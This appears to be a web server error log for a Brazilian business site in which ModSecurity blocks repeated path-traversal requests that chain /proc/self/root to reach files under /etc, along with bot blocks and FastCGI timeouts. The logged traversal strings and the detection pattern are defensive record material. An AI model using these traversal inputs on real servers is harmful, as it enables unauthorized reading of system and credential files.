https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 12:32:58.531070 2026] [:error] [pid 9155:tid 140411548894976] [client 74.7.243.203:52584] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abl0KtbI7zhHXcabyMU3igAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:32:58.907330 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.228.16:49586] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abl0KtY0UrI5A3LftIzzjQAAAYA"]
[Tue Mar 17 12:33:07.341340 2026] [core:alert] [pid 11293:tid 140411733534464] [client 74.7.243.203:46544] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:33:22.250836 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.243.203:46560] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abl0QqBJNF7axNlVR0UOUAAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:33:41.567367 2026] [:error] [pid 17965:tid 140411674785536] [client 74.7.243.203:41508] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abl0Vat8Nd0UC_OcbVHDbQAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:33:42.893052 2026] [:error] [pid 2160:tid 140411624429312] [client 74.7.243.203:41418] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abl0Vjjrdei6i7MVRTDUWQAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:33:48.945178 2026] [:error] [pid 2160:tid 140411733534464] [client 74.7.243.203:41418] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abl0XDjrdei6i7MVRTDUXwAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:34:09.149887 2026] [:error] [pid 2160:tid 140411641214720] [client 74.7.243.203:41418] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abl0cTjrdei6i7MVRTDUagAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:34:22.133604 2026] [:error] [pid 18380:tid 140411658000128] [client 74.7.243.203:49274] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abl0fq4xEDsg_V3ESNZDrQAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:34:26.556299 2026] [:error] [pid 2160:tid 140411548894976] [client 74.7.243.203:54618] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abl0gjjrdei6i7MVRTDUbwAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:34:35.031084 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.243.203:55184] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abl0i9Y0UrI5A3LftIzzrQAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:34:37.363949 2026] [:error] [pid 2598:tid 140411699963648] [client 74.7.243.203:55198] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abl0jRj0p0SRWAqcjGFyCwAAAwU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:34:38.501895 2026] [proxy_fcgi:error] [pid 18380:tid 140411599251200] (70007)The timeout specified has expired: [client 45.227.253.15:46574] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:34:44.883608 2026] [:error] [pid 9299:tid 140411708356352] [client 74.7.243.203:55202] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abl0lL-sgTmmJoPuMdyvOwAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:35:07.662945 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.203:56366] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abl0q9Y0UrI5A3LftIzzvQAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:35:17.137822 2026] [proxy_fcgi:error] [pid 7437:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:38764] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:35:45.137814 2026] [proxy_fcgi:error] [pid 2160:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:39160] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:36:27.133792 2026] [proxy_fcgi:error] [pid 17965:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:39812] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:36:57.125806 2026] [proxy_fcgi:error] [pid 9155:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:40372] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:37:22.137772 2026] [proxy_fcgi:error] [pid 11293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:40744] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:37:25.949608 2026] [:error] [pid 7437:tid 140411666392832] [client 74.7.244.31:59766] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abl1NQeiSKl8TjouI-YS8gAAA8k"]
[Tue Mar 17 12:37:43.129786 2026] [proxy_fcgi:error] [pid 11293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40962] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:38:19.047012 2026] [:error] [pid 9155:tid 140411616036608] [client 74.7.228.16:57748] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abl1a9bI7zhHXcabyMU4TgAAAk8"]
[Tue Mar 17 12:38:21.131280 2026] [proxy_fcgi:error] [pid 2473:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:41338] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:38:49.129810 2026] [proxy_fcgi:error] [pid 2598:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:41608] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:39:27.135139 2026] [proxy_fcgi:error] [pid 2598:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:42126] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:39:54.069892 2026] [proxy_fcgi:error] [pid 9299:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42600] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:40:16.121816 2026] [proxy_fcgi:error] [pid 9155:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42950] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:40:37.121794 2026] [proxy_fcgi:error] [pid 19507:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:43132] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:40:59.133928 2026] [proxy_fcgi:error] [pid 2473:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:43254] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:41:21.129777 2026] [proxy_fcgi:error] [pid 17965:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:43458] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:41:42.125791 2026] [proxy_fcgi:error] [pid 2598:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:43668] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:42:04.143328 2026] [proxy_fcgi:error] [pid 9299:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:43930] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:42:26.127924 2026] [proxy_fcgi:error] [pid 2598:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44208] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:42:47.129783 2026] [proxy_fcgi:error] [pid 9299:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:44456] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:43:09.105794 2026] [proxy_fcgi:error] [pid 9299:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44728] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:43:31.389844 2026] [proxy_fcgi:error] [pid 9155:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:45002] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:43:38.444142 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.228.16:42616] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abl2qtY0UrI5A3LftIz0UwAAAZE"]
[Tue Mar 17 12:43:53.125882 2026] [proxy_fcgi:error] [pid 2160:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:45292] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:44:15.131640 2026] [proxy_fcgi:error] [pid 19507:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:45692] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:44:36.134823 2026] [proxy_fcgi:error] [pid 18380:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46052] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:44:57.060041 2026] [proxy_fcgi:error] [pid 2598:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:46276] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:45:19.110689 2026] [proxy_fcgi:error] [pid 2473:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:46456] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:45:40.128687 2026] [proxy_fcgi:error] [pid 2598:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46690] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:46:01.113935 2026] [proxy_fcgi:error] [pid 18380:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:46876] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:46:22.164742 2026] [proxy_fcgi:error] [pid 11293:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47116] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:46:44.093557 2026] [proxy_fcgi:error] [pid 9155:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47372] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:47:06.133798 2026] [proxy_fcgi:error] [pid 18380:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47604] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:47:27.122211 2026] [proxy_fcgi:error] [pid 17965:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:47858] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:47:48.129798 2026] [proxy_fcgi:error] [pid 2160:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:48090] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:48:10.309337 2026] [proxy_fcgi:error] [pid 7437:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:48290] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:48:31.469904 2026] [proxy_fcgi:error] [pid 17965:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:48530] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:48:53.045860 2026] [proxy_fcgi:error] [pid 2473:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:48802] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:49:14.061839 2026] [proxy_fcgi:error] [pid 11293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:49068] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:49:32.899125 2026] [:error] [pid 2598:tid 140411699963648] [client 74.7.228.16:52708] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abl4DBj0p0SRWAqcjGFzJAAAAwU"]
[Tue Mar 17 12:49:36.115159 2026] [proxy_fcgi:error] [pid 18380:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:49234] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:49:57.125908 2026] [proxy_fcgi:error] [pid 2160:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49502] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:50:07.045403 2026] [:error] [pid 2160:tid 140411699963648] [client 74.7.244.31:34122] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abl4Ljjrdei6i7MVRTDVygAAAQU"]
[Tue Mar 17 12:50:19.037877 2026] [proxy_fcgi:error] [pid 19507:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:49906] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:50:41.141813 2026] [proxy_fcgi:error] [pid 7437:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:50340] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:51:02.134556 2026] [proxy_fcgi:error] [pid 2598:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:50748] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:51:23.127972 2026] [proxy_fcgi:error] [pid 9155:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:51092] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:51:44.126416 2026] [proxy_fcgi:error] [pid 9155:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:51384] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:52:05.126418 2026] [proxy_fcgi:error] [pid 11293:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:51840] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:52:27.144141 2026] [proxy_fcgi:error] [pid 2598:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:52322] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:52:49.133769 2026] [proxy_fcgi:error] [pid 2473:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:52754] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:53:10.149810 2026] [proxy_fcgi:error] [pid 11293:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:53092] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:53:31.121851 2026] [proxy_fcgi:error] [pid 2160:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53420] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:53:53.135659 2026] [proxy_fcgi:error] [pid 2598:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:53680] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:54:15.109987 2026] [proxy_fcgi:error] [pid 18380:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53894] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:54:36.136194 2026] [proxy_fcgi:error] [pid 2473:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:54150] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:54:57.129924 2026] [proxy_fcgi:error] [pid 2160:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:54366] AH01075: Error dispatching request to : (polling)
